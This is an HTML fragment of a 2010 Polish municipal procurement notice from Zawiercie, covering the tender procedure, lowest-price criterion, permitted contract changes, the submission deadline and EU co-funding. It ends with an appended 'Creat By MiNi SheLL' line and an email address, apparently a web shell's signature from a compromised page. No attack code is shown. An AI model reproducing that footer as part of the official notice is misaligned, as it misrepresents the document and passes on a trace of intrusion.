<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą:
1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 4 do specyfikacji.
2)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 5 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany istotnych postanowień umowy w przypadku, gdy:
1)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
2)	konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych 
w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
3)	konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, w szczególności w zakresie sprawozdawczości,
4)	wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
5)	przekształcenia podmiotowego Wykonawcy,
6)	zmiany członków personelu kluczowego Wykonawcy, w przypadku wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja/ odejście z pracy lub innych uniemożliwiających należyte wykonywanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego na etapie wyboru oferty w postępowaniu przetargowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych (pokój nr 202)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2010 godzina 08:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Punkt Informacyjny (parter UM)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 1 czerwca 2010 r. Projekt Nasz cel - Twoja firma jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Działanie 6.2 Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com